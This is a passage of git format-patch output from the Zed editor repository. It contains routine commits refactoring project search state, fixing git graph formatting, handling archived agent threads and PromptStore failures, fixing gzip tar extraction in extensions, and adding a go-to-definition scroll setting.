excerpts.clear(cx)); - project_search.no_results = Some(true); - project_search.limit_reached = false; - project_search.waiting_for_scan = false; }) .ok()?; let mut limit_reached = false; while let Some(results) = matches.next().await { - let (buffers_with_ranges, has_reached_limit, is_waiting_for_scan) = cx + let (buffers_with_ranges, has_reached_limit, search_activity) = cx .background_executor() .spawn(async move { let mut limit_reached = false; - let mut waiting_for_scan = false; + let mut search_activity = None; let mut buffers_with_ranges = Vec::with_capacity(results.len()); for result in results { match result { @@ -446,18 +473,21 @@ impl ProjectSearch { limit_reached = true; } project::search::SearchResult::WaitingForScan => { - waiting_for_scan = true; + search_activity = Some(SearchActivity::WaitingForScan); + } + project::search::SearchResult::Searching => { + search_activity = Some(SearchActivity::Searching); } } } - (buffers_with_ranges, limit_reached, waiting_for_scan) + (buffers_with_ranges, limit_reached, search_activity) }) .await; limit_reached |= has_reached_limit; - if is_waiting_for_scan { + if let Some(search_activity) = search_activity { project_search .update(cx, |project_search, cx| { - project_search.waiting_for_scan = true; + project_search.search_state = SearchState::Running(search_activity); cx.notify(); }) .ok()?; @@ -495,11 +525,11 @@ impl ProjectSearch { project_search .update(cx, |project_search, cx| { - if !project_search.match_ranges.is_empty() { - project_search.no_results = Some(false); - } - project_search.limit_reached = limit_reached; - project_search.waiting_for_scan = false; + project_search.search_state = if project_search.match_ranges.is_empty() { + SearchState::Completed(SearchCompletion::NoResults) + } else { + SearchState::Completed(SearchCompletion::Results { limit_reached }) + }; project_search.pending_search.take(); cx.notify(); }) @@ -531,36 +561,26 @@ impl Render for ProjectSearchView { .child(self.results_editor.clone()) } else { let model = self.entity.read(cx); - let has_no_results = model.no_results.unwrap_or(false); - let is_search_underway = model.pending_search.is_some(); - let is_waiting_for_scan = model.waiting_for_scan; - - let heading_text = if is_waiting_for_scan { - "Loading project…" - } else if is_search_underway { - "Searching…" - } else if has_no_results { - "No Results" - } else { - "Search All Files" + + let heading_text = match model.search_state { + SearchState::Running(SearchActivity::WaitingForScan) => "Loading project…", + SearchState::Running(SearchActivity::Searching) => "Searching…", + SearchState::Completed(SearchCompletion::NoResults) => "No Results", + _ => "Search All Files", }; let heading_text = div() .justify_center() .child(Label::new(heading_text).size(LabelSize::Large)); - let page_content: Option = if let Some(no_results) = model.no_results { - if model.pending_search.is_none() && no_results { - Some( - Label::new("No results found in this project for the provided query") - .size(LabelSize::Small) - .into_any_element(), - ) - } else { - None - } - } else { - Some(self.landing_text_minor(cx).into_any_element()) + let page_content: Option = match model.search_state { + SearchState::Idle => Some(self.landing_text_minor(cx).into_any_element()), + SearchState::Completed(SearchCompletion::NoResults) => Some( + Label::new("No results found in this project for the provided query") + .size(LabelSize::Small) + .into_any_element(), + ), + _ => None, }; let page_content = page_content.map(|text| div().child(text)); @@ -2179,16 +2199,19 @@ impl Render for ProjectSearchBar { }; let theme_colors = cx.theme().colors(); let project_search = search.entity.read(cx); - let limit_reached = project_search.limit_reached; + let limit_reached = project_search.search_state.limit_reached(); let is_search_underway = project_search.pending_search.is_some(); let color_override = match ( - &project_search.pending_search, - project_search.no_results, + project_search.search_state, &project_search.active_query, &project_search.last_search_query_text, ) { - (None, Some(true), Some(q), Some(p)) if q.as_str() == p => Some(Color::Error), + ( + SearchState::Completed(SearchCompletion::NoResults), + Some(query), + Some(previous_query), + ) if query.as_str() == previous_query => Some(Color::Error), _ => None, }; From 5c1462d4e3e08e009f5ba2685c67a586911f3823 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Fri, 24 Apr 2026 07:44:36 -0400 Subject: [PATCH 008/231] Fix broken rustfmt in git graph code (#54730) rustfmt is broken in this code. I believe it's too deep / complex in the builder pattern. After factoring some bits out, it now auto formats. Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- crates/git_graph/src/git_graph.rs | 250 +++++++++++++----------------- 1 file changed, 109 insertions(+), 141 deletions(-) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index e0f4afff467f90..6d3d99ee2a98aa 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -2766,39 +2766,35 @@ impl Render for GitGraph { .flex() .flex_col() .child(render_table_header( - if !is_file_history { - - TableRow::from_vec( - vec![ - Label::new("Graph") - .color(Color::Muted) - .truncate() - .into_any_element(), - Label::new("Description") - .color(Color::Muted) - .into_any_element(), - Label::new("Date").color(Color::Muted).into_any_element(), - Label::new("Author").color(Color::Muted).into_any_element(), - Label::new("Commit").color(Color::Muted).into_any_element(), - ], - 5, - ) - } else { - TableRow::from_vec( - vec![ - Label::new("Description") - .color(Color::Muted) - .into_any_element(), - Label::new("Date").color(Color::Muted).into_any_element(), - Label::new("Author").color(Color::Muted).into_any_element(), - Label::new("Commit").color(Color::Muted).into_any_element(), - ], - 4, - ) - - }, - + TableRow::from_vec( + vec![ + Label::new("Graph") + .color(Color::Muted) + .truncate() + .into_any_element(), + Label::new("Description") + .color(Color::Muted) + .into_any_element(), + Label::new("Date").color(Color::Muted).into_any_element(), + Label::new("Author").color(Color::Muted).into_any_element(), + Label::new("Commit").color(Color::Muted).into_any_element(), + ], + 5, + ) + } else { + TableRow::from_vec( + vec![ + Label::new("Description") + .color(Color::Muted) + .into_any_element(), + Label::new("Date").color(Color::Muted).into_any_element(), + Label::new("Author").color(Color::Muted).into_any_element(), + Label::new("Commit").color(Color::Muted).into_any_element(), + ], + 4, + ) + }, header_context, Some(header_resize_info), Some(self.column_widths.entity_id()), @@ -2811,6 +2807,85 @@ impl Render for GitGraph { let weak_self = cx.weak_entity(); let focus_handle = self.focus_handle.clone(); + let graph_canvas = div() + .id("graph-canvas") + .size_full() + .overflow_hidden() + .child( + div() + .size_full() + .child(self.render_graph_canvas(window, cx)), + ) + .on_scroll_wheel(cx.listener(Self::handle_graph_scroll)) + .on_mouse_move(cx.listener(Self::handle_graph_mouse_move)) + .on_click(cx.listener(Self::handle_graph_click)) + .on_hover(cx.listener(|this, &is_hovered: &bool, _, cx| { + if !is_hovered && this.hovered_entry_idx.is_some() { + this.hovered_entry_idx = None; + cx.notify(); + } + })); + + let commits_table = Table::new(4) + .interactable(&self.table_interaction_state) + .hide_row_borders() + .hide_row_hover() + .width_config(table_width_config) + .map_row(move |(index, row), window, cx| { + let is_selected = selected_entry_idx == Some(index); + let is_hovered = hovered_entry_idx == Some(index); + let is_focused = focus_handle.is_focused(window); + let weak = weak_self.clone(); + let weak_for_hover = weak.clone(); + + let hover_bg = cx.theme().colors().element_hover.opacity(0.6); + let selected_bg = if is_focused { + cx.theme().colors().element_selected + } else { + cx.theme().colors().element_hover + }; + + row.h(row_height) + .when(is_selected, |row| row.bg(selected_bg)) + .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) + .on_hover(move |&is_hovered, _, cx| { + weak_for_hover + .update(cx, |this, cx| { + if is_hovered { + if this.hovered_entry_idx != Some(index) { + this.hovered_entry_idx = Some(index); + cx.notify(); + } + } else if this.hovered_entry_idx == Some(index) + { + this.hovered_entry_idx = None; + cx.notify(); + } + }) + .ok(); + }) + .on_click(move |event, window, cx| { + let click_count = event.click_count(); + weak.update(cx, |this, cx| { + this.select_entry( + index, + ScrollStrategy::Center, + cx, + ); + if click_count >= 2 { + this.open_commit_view(index, window, cx); + } + }) + .ok(); + }) + .into_any_element() + }) + .uniform_list( + "git-graph-commits", + commit_count, + cx.processor(Self::render_table_rows), + ); + bind_redistributable_columns( div() .relative() @@ -2827,34 +2902,7 @@ impl Render for GitGraph { .h_full() .min_w_0() .overflow_hidden() - .child( - div() - .id("graph-canvas") - .size_full() - .overflow_hidden() - .child( - div() - .size_full() - .child(self.render_graph_canvas(window, cx)), - ) - .on_scroll_wheel( - cx.listener(Self::handle_graph_scroll), - ) - .on_mouse_move( - cx.listener(Self::handle_graph_mouse_move), - ) - .on_click(cx.listener(Self::handle_graph_click)) - .on_hover(cx.listener( - |this, &is_hovered: &bool, _, cx| { - if !is_hovered - && this.hovered_entry_idx.is_some() - { - this.hovered_entry_idx = None; - cx.notify(); - } - }, - )), - ), + .child(graph_canvas), ) }) .child( @@ -2862,87 +2910,7 @@ impl Render for GitGraph { .w(DefiniteLength::Fraction(table_fraction)) .h_full() .min_w_0() - .child( - Table::new(4) - .interactable(&self.table_interaction_state) - .hide_row_borders() - .hide_row_hover() - .width_config(table_width_config) - .map_row(move |(index, row), window, cx| { - let is_selected = - selected_entry_idx == Some(index); - let is_hovered = - hovered_entry_idx == Some(index); - let is_focused = - focus_handle.is_focused(window); - let weak = weak_self.clone(); - let weak_for_hover = weak.clone(); - - let hover_bg = cx - .theme() - .colors() - .element_hover - .opacity(0.6); - let selected_bg = if is_focused { - cx.theme().colors().element_selected - } else { - cx.theme().colors().element_hover - }; - - row.h(row_height) - .when(is_selected, |row| row.bg(selected_bg)) - .when( - is_hovered && !is_selected, - |row| row.bg(hover_bg), - ) - .on_hover(move |&is_hovered, _, cx| { - weak_for_hover - .update(cx, |this, cx| { - if is_hovered { - if this.hovered_entry_idx - != Some(index) - { - this.hovered_entry_idx = - Some(index); - cx.notify(); - } - } else if this - .hovered_entry_idx - == Some(index) - { - this.hovered_entry_idx = - None; - cx.notify(); - } - }) - .ok(); - }) - .on_click(move |event, window, cx| { - let click_count = event.click_count(); - weak.update(cx, |this, cx| { - this.select_entry( - index, - ScrollStrategy::Center, - cx, - ); - if click_count >= 2 { - this.open_commit_view( - index, - window, - cx, - ); - } - }) - .ok(); - }) - .into_any_element() - }) - .uniform_list( - "git-graph-commits", - commit_count, - cx.processor(Self::render_table_rows), - ), - ), + .child(commits_table), ), ) .child(render_redistributable_columns_resize_handles( From c47c5c1e1329f46d482c5c0ff36dacc1aec51f84 Mon Sep 17 00:00:00 2001 From: XiaoYan Li Date: Fri, 24 Apr 2026 21:02:08 +0900 Subject: [PATCH 009/231] agent_ui: Switch to All filter when last archived thread is removed (#54763) When the archive view's filter is set to "Archived Only" and the user deletes (or unarchives) the last archived thread, the toggle button becomes disabled because there are no archived threads left. With the filter still pinned to "Archived Only", the list goes empty and there's no way for the user to switch back to the All view. This fixes it by automatically falling back to `ThreadFilter::All` inside `update_items` whenever the current filter is `ArchivedOnly` but the store has no archived entries. Since `update_items` is invoked from the `ThreadMetadataStore` observer, this covers all paths that mutate the store, not only deletions triggered from this view. Release Notes: - Fixed the agent thread archive view getting stuck on an empty "Archived Only" list after the last archived thread was removed. --------- Co-authored-by: Neel --- crates/agent_ui/src/threads_archive_view.rs | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index e6e9ca4f5f5c09..892c6b0c0e4fb7 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -261,9 +261,19 @@ impl ThreadsArchiveView { } fn update_items(&mut self, cx: &mut Context) { + let store = ThreadMetadataStore::global(cx).read(cx); + + // If we're filtering to archived threads but none remain (e.g. the + // user just deleted the last one), fall back to showing all threads + // so they aren't stranded with an empty list and a disabled toggle. + if self.thread_filter == ThreadFilter::ArchivedOnly + && store.archived_entries().next().is_none() + { + self.thread_filter = ThreadFilter::All; + } + let thread_filter = self.thread_filter; - let sessions = ThreadMetadataStore::global(cx) - .read(cx) + let sessions = store .entries() .filter(|t| match thread_filter { ThreadFilter::All => true, From e15e5b84b5d884349daecc80c5635f7a1352f570 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Fri, 24 Apr 2026 08:32:28 -0400 Subject: [PATCH 010/231] Don't block thread creation when PromptStore fails to initialize (#52333) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit NativeAgentServer::connect used `prompt_store.await?` which turned any PromptStore initialization failure (permission denied, disk issues, etc.) into a hard connection error, putting the ConversationView into LoadError state and preventing all new native agent threads from being created. Changed to `.log_err()` so the error is logged at ERROR level but thread creation proceeds with `prompt_store: None`. `NativeAgent::new` already accepts `Option>` and handles `None` gracefully — user custom prompts won't load but threads still work. Added a regression test that serializes a stale thread ID, loads the panel (triggering the "last active thread not found in database" warning), then dispatches NewThread through the real NativeAgentServer path and verifies it produces a connected thread. Release Notes: - Agent panel now handles filesystem errors more gracefully --- crates/agent/src/native_agent_server.rs | 7 +++-- crates/agent_ui/src/agent_panel.rs | 38 +++++++++++++++++++++++++ 2 files changed, 42 insertions(+), 3 deletions(-) diff --git a/crates/agent/src/native_agent_server.rs b/crates/agent/src/native_agent_server.rs index b79cd67b598bfa..bc0f75bcff591f 100644 --- a/crates/agent/src/native_agent_server.rs +++ b/crates/agent/src/native_agent_server.rs @@ -11,6 +11,7 @@ use language_model::{LanguageModelId, LanguageModelProviderId, LanguageModelRegi use project::{AgentId, Project}; use prompt_store::PromptStore; use settings::{LanguageModelSelection, Settings as _, update_settings_file}; +use util::ResultExt as _; use crate::{NativeAgent, NativeAgentConnection, ThreadStore, templates::Templates}; @@ -48,11 +49,11 @@ impl AgentServer for NativeAgentServer { cx.spawn(async move |cx| { log::debug!("Creating templates for native agent"); let templates = Templates::new(); - let prompt_store = prompt_store.await?; + let prompt_store = prompt_store.await.log_err(); log::debug!("Creating native agent entity"); - let agent = cx - .update(|cx| NativeAgent::new(thread_store, templates, Some(prompt_store), fs, cx)); + let agent = + cx.update(|cx| NativeAgent::new(thread_store, templates, prompt_store, fs, cx)); // Create the connection wrapper let connection = NativeAgentConnection(agent); diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index e5c6f1610225d2..3ef0934e2deedc 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ b/crates/agent_ui/src/agent_panel.rs @@ -7123,4 +7123,42 @@ mod tests { ); }); } + + /// Regression test: NewThread must produce a connected thread even when + /// the PromptStore fails to initialize (e.g. LMDB permission error). + /// Before the fix, `NativeAgentServer::connect` propagated the + /// PromptStore error with `?`, which put every new ConversationView + /// into LoadError and made it impossible to start any native-agent + /// thread. + #[gpui::test] + async fn test_new_thread_with_prompt_store_error(cx: &mut TestAppContext) { + let (panel, mut cx) = setup_panel(cx).await; + + // NativeAgentServer::connect needs a global Fs. + let fs = FakeFs::new(cx.executor()); + cx.update(|_, cx| { + ::set_global(fs.clone(), cx); + }); + cx.run_until_parked(); + + // Dispatch NewThread, which goes through the real NativeAgentServer + // path. In tests the PromptStore LMDB open fails with + // "Permission denied"; the fix (.log_err() instead of ?) lets + // the connection succeed anyway. + panel.update_in(&mut cx, |panel, window, cx| { + panel.new_thread(&NewThread, window, cx); + }); + cx.run_until_parked(); + + panel.read_with(&cx, |panel, cx| { + assert!( + panel.active_conversation_view().is_some(), + "panel should have a conversation view after NewThread" + ); + assert!( + panel.active_agent_thread(cx).is_some(), + "panel should have an active, connected agent thread" + ); + }); + } } From a0f58a092f0b1bbf6a85dfa329d5850d541502a4 Mon Sep 17 00:00:00 2001 From: Riccardo Strina <85676009+tartarughina@users.noreply.github.com> Date: Fri, 24 Apr 2026 14:42:45 +0200 Subject: [PATCH 011/231] Fix gzip tar extraction by buffering decompressed bytes (#54696) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit When extracting gzip tar files, the `GzipDecoder` was being pinned directly over the response body stream. This caused issues because the decoder needs to read the entire stream into memory before the `Archive` can be created and used. Buffer the decompressed bytes into a `Vec` first, then create the decoder over that in-memory buffer to ensure all data is available when needed. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes [Java extension issue 222](https://github.com/zed-extensions/java/issues/222) Testing: **Automated:** - `cargo test -p extension_host test_extension_store_with_test_extension` — integration test that exercises the full `download_file` → `GzipTar` → `extract_tar_file` path through a WASM extension with a `FakeHttpClient` serving a real gzipped tar archive. Passed. **Manual:** - Built and ran Zed with `cargo +nightly run`, deleted and reinstalled the Java extension. The extension's language server download completed successfully and all expected files were extracted. Release Notes: - Fixed extension `download_file` with `GzipTar` silently dropping archive entries by buffering the full HTTP response before extraction, matching the approach already used for extension installation. See https://github.com/zed-industries/zed/blob/c6bdb697343cd470f96a56a5c5d288524baf4599/crates/extension_host/src/extension_host.rs#L761 --- .../extension_host/src/wasm_host/wit/since_v0_1_0.rs | 11 +++++++---- .../extension_host/src/wasm_host/wit/since_v0_8_0.rs | 11 +++++++---- 2 files changed, 14 insertions(+), 8 deletions(-) diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs index 4cd034d4d6af02..fca4dca2459e33 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_1_0.rs @@ -531,7 +531,7 @@ impl ExtensionImports for WasmState { "download failed with status {}", response.status() ); - let body = BufReader::new(response.body_mut()); + let mut body = BufReader::new(response.body_mut()); match file_type { DownloadedFileType::Uncompressed => { @@ -550,11 +550,14 @@ impl ExtensionImports for WasmState { .await?; } DownloadedFileType::GzipTar => { - let body = GzipDecoder::new(body); - futures::pin_mut!(body); + let mut tar_gz_bytes = Vec::new(); + body.read_to_end(&mut tar_gz_bytes).await?; + let decompressed_bytes = + GzipDecoder::new(BufReader::new(tar_gz_bytes.as_slice())); + futures::pin_mut!(decompressed_bytes); self.host .fs - .extract_tar_file(&destination_path, Archive::new(body)) + .extract_tar_file(&destination_path, Archive::new(decompressed_bytes)) .await?; } DownloadedFileType::Zip => { diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index 660ddd9688f7dc..683e69e08704dc 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -1072,7 +1072,7 @@ impl ExtensionImports for WasmState { "download failed with status {}", response.status() ); - let body = BufReader::new(response.body_mut()); + let mut body = BufReader::new(response.body_mut()); match file_type { DownloadedFileType::Uncompressed => { @@ -1091,11 +1091,14 @@ impl ExtensionImports for WasmState { .await?; } DownloadedFileType::GzipTar => { - let body = GzipDecoder::new(body); - futures::pin_mut!(body); + let mut tar_gz_bytes = Vec::new(); + body.read_to_end(&mut tar_gz_bytes).await?; + let decompressed_bytes = + GzipDecoder::new(BufReader::new(tar_gz_bytes.as_slice())); + futures::pin_mut!(decompressed_bytes); self.host .fs - .extract_tar_file(&destination_path, Archive::new(body)) + .extract_tar_file(&destination_path, Archive::new(decompressed_bytes)) .await?; } DownloadedFileType::Zip => { From 35dcfec7eba31349cdc2954824f1b1c8d79a80f6 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Fri, 24 Apr 2026 15:43:30 +0300 Subject: [PATCH 012/231] Reveal all go to definitions in the center by default (#54778) Allows to reconfigure behavior, including the previous one, `top` Closes https://github.com/zed-industries/zed/issues/52173 Release Notes: - Reworked go to definition to open its target in the center of the editor. Can be reconfigured with `go_to_definition_scroll_strategy`. --- assets/settings/default.json | 7 ++++++ crates/editor/src/editor.rs | 10 +++++--- crates/editor/src/editor_settings.rs | 9 ++++--- crates/editor/src/scroll/autoscroll.rs | 11 +++++++++ crates/settings/src/vscode_import.rs | 1 + crates/settings_content/src/editor.rs | 34 ++++++++++++++++++++++++++ crates/settings_ui/src/page_data.rs | 20 ++++++++++++++- crates/settings_ui/src/settings_ui.rs | 1 + docs/src/reference/all-settings.md | 32 ++++++++++++++++++++++++ 9 files changed, 117 insertions(+), 8 deletions(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index 7e942393d57088..464587e6290b2f 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -355,6 +355,13 @@ // 1. Do nothing: `none` // 2. Find references for the same symbol: `find_all_references` (default) "go_to_definition_fallback": "find_all_references", + // How to scroll the target into view when navigating to a definition or reference + // (e.g. Go to Definition, Go to Type Definition, Find All References). + // + // 1. Vertically center the target in the viewport: `center` (default) + // 2. Scroll the minimum amount needed to make the target visible: `minimum` + // 3. Scroll so the target appears near the top of the viewport: `top` + "go_to_definition_scroll_strategy": "center", // Which level to use to filter out diagnostics displayed in the editor. // // Affects the editor rendering only, and does not interrupt diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 7d425fa98f4f03..8110c211a502c3 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -18339,7 +18339,7 @@ impl Editor { }; let anchor_range = range.to_anchors(&multibuffer.snapshot(cx)); self.change_selections( - SelectionEffects::default().nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)).nav_history(true), window, cx, |s| s.select_anchor_ranges([anchor_range]), @@ -19145,7 +19145,8 @@ impl Editor { } editor.change_selections( - SelectionEffects::default().nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19224,7 +19225,8 @@ impl Editor { } target_editor.change_selections( - SelectionEffects::default().nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19504,7 +19506,7 @@ impl Editor { let Range { start, end } = locations[destination_location_index]; editor.update_in(cx, |editor, window, cx| { - let effects = SelectionEffects::default(); + let effects = SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)); editor.unfold_ranges(&[start..end], false, false, cx); editor.change_selections(effects, window, cx, |s| { diff --git a/crates/editor/src/editor_settings.rs b/crates/editor/src/editor_settings.rs index b35bce02af4a56..1999d0e537e525 100644 --- a/crates/editor/src/editor_settings.rs +++ b/crates/editor/src/editor_settings.rs @@ -5,9 +5,10 @@ use language::CursorShape; use project::project_settings::DiagnosticSeverity; pub use settings::{ CodeLens, CompletionDetailAlignment, CurrentLineHighlight, DelayMs, DiffViewStyle, DisplayIn, - DocumentColorsRenderMode, DoubleClickInMultibuffer, GoToDefinitionFallback, HideMouseMode, - MinimapThumb, MinimapThumbBorder, MultiCursorModifier, ScrollBeyondLastLine, - ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, SnippetSortOrder, + DocumentColorsRenderMode, DoubleClickInMultibuffer, GoToDefinitionFallback, + GoToDefinitionScrollStrategy, HideMouseMode, MinimapThumb, MinimapThumbBorder, + MultiCursorModifier, ScrollBeyondLastLine, ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, + SnippetSortOrder, }; use settings::{RegisterSetting, RelativeLineNumbers, Settings}; use ui::scrollbars::ShowScrollbar; @@ -52,6 +53,7 @@ pub struct EditorSettings { pub auto_signature_help: bool, pub show_signature_help_after_edits: bool, pub go_to_definition_fallback: GoToDefinitionFallback, + pub go_to_definition_scroll_strategy: GoToDefinitionScrollStrategy, pub jupyter: Jupyter, pub hide_mouse: Option, pub snippet_sort_order: SnippetSortOrder, @@ -285,6 +287,7 @@ impl Settings for EditorSettings { auto_signature_help: editor.auto_signature_help.unwrap(), show_signature_help_after_edits: editor.show_signature_help_after_edits.unwrap(), go_to_definition_fallback: editor.go_to_definition_fallback.unwrap(), + go_to_definition_scroll_strategy: editor.go_to_definition_scroll_strategy.unwrap(), jupyter: Jupyter { enabled: editor.jupyter.unwrap().enabled.unwrap(), }, diff --git a/crates/editor/src/scroll/autoscroll.rs b/crates/editor/src/scroll/autoscroll.rs index c2b07ffa96aef4..38f0f4b022899f 100644 --- a/crates/editor/src/scroll/autoscroll.rs +++ b/crates/editor/src/scroll/autoscroll.rs @@ -2,6 +2,7 @@ use crate::{ DisplayPoint, DisplayRow, Editor, EditorMode, EditorSettings, LineWithInvisibles, RowExt, SelectionEffects, display_map::{DisplaySnapshot, ToDisplayPoint}, + editor_settings::GoToDefinitionScrollStrategy, scroll::{ScrollOffset, WasScrolled}, }; use gpui::{App, Bounds, Context, Pixels, Window}; @@ -33,6 +34,16 @@ impl Autoscroll { Self::Strategy(AutoscrollStrategy::Center, None) } + /// Returns the autoscroll strategy configured for navigation to definitions + /// and references, based on `go_to_definition_scroll_strategy`. + pub fn for_go_to_definition(cx: &App) -> Self { + match EditorSettings::get_global(cx).go_to_definition_scroll_strategy { + GoToDefinitionScrollStrategy::Center => Self::center(), + GoToDefinitionScrollStrategy::Minimum => Self::fit(), + GoToDefinitionScrollStrategy::Top => Self::focused(), + } + } + /// scrolls so the newest cursor is near the top /// (offset by vertical_scroll_margin) pub fn focused() -> Self { diff --git a/crates/settings/src/vscode_import.rs b/crates/settings/src/vscode_import.rs index 31bcaf847b09c7..64f00bc5d6501b 100644 --- a/crates/settings/src/vscode_import.rs +++ b/crates/settings/src/vscode_import.rs @@ -265,6 +265,7 @@ impl VsCodeSettings { fast_scroll_sensitivity: self.read_f32("editor.fastScrollSensitivity"), sticky_scroll: self.sticky_scroll_content(), go_to_definition_fallback: None, + go_to_definition_scroll_strategy: None, gutter: self.gutter_content(), hide_mouse: None, horizontal_scroll_margin: None, diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 3ba21e830828b4..18a7bd5fd497ce 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -192,6 +192,12 @@ pub struct EditorSettingsContent { /// Default: FindAllReferences pub go_to_definition_fallback: Option, + /// How to scroll the target into view when navigating to a definition or reference + /// (e.g. Go to Definition, Go to Type Definition, Find All References). + /// + /// Default: center + pub go_to_definition_scroll_strategy: Option, + /// Jupyter REPL settings. pub jupyter: Option, @@ -799,6 +805,34 @@ pub enum GoToDefinitionFallback { FindAllReferences, } +/// How to scroll the target into view when navigating to a definition or reference. +/// +/// Default: center +#[derive( + Copy, + Clone, + Debug, + Default, + Serialize, + Deserialize, + PartialEq, + Eq, + JsonSchema, + MergeFrom, + strum::VariantArray, + strum::VariantNames, +)] +#[serde(rename_all = "snake_case")] +pub enum GoToDefinitionScrollStrategy { + /// Vertically center the target in the viewport. + #[default] + Center, + /// Scroll the minimum amount needed to make the target visible. + Minimum, + /// Scroll so the target appears near the top of the viewport. + Top, +} + /// Determines when the mouse cursor should be hidden in an editor or input box. /// /// Default: on_typing_and_movement diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 8a27197f7f0b7c..5b43d0a18426bd 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -9106,7 +9106,7 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { /// LanguageSettings items that should be included in the "Languages & Tools" page /// not the "Editor" page fn non_editor_language_settings_data() -> Box<[SettingsPageItem]> { - fn lsp_section() -> [SettingsPageItem; 8] { + fn lsp_section() -> [SettingsPageItem; 9] { [ SettingsPageItem::SectionHeader("LSP"), SettingsPageItem::SettingItem(SettingItem { @@ -9188,6 +9188,24 @@ fn non_editor_language_settings_data() -> Box<[SettingsPageItem]> { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Go To Definition Scroll Strategy", + description: "How to scroll the target into view when navigating to a definition or reference.", + field: Box::new(SettingField { + json_path: Some("go_to_definition_scroll_strategy"), + pick: |settings_content| { + settings_content + .editor + .go_to_definition_scroll_strategy + .as_ref() + }, + write: |settings_content, value, _| { + settings_content.editor.go_to_definition_scroll_strategy = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Semantic Tokens", description: { diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index d6696cc7033df5..a718e1277efca6 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -483,6 +483,7 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) + .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index e96dfe0655d9fa..c6c33b8b5edd0d 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -2424,6 +2424,38 @@ Example: } ``` +## Go to Definition Scroll Strategy + +- Description: How to scroll the target into view when navigating to a definition or reference (e.g. {#action editor::GoToDefinition}, {#action editor::GoToTypeDefinition}, {#action editor::FindAllReferences}). +- Setting: `go_to_definition_scroll_strategy` +- Default: `"center"` + +**Options** + +1. Vertically center the target in the viewport (default): + +```json [settings] +{ + "go_to_definition_scroll_strategy": "center" +} +``` + +2. Scroll the minimum amount needed to make the target visible: + +```json [settings] +{ + "go_to_definition_scroll_strategy": "minimum" +} +``` + +3. Scroll so the target appears near the top of the viewport: + +```json [settings] +{ + "go_to_definition_scroll_strategy": "top" +} +``` + ## Hard Tabs - Description: Whether to indent lines using tab characters or multiple spaces. From 2660a1e32e7fb23525b2d83905bbd8718225180d Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Fri, 24 Apr 2026 09:47:15 -0300 Subject: [PATCH 013/231] title_bar: Add "panel layout" menu to the user menu (#54771) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Closes 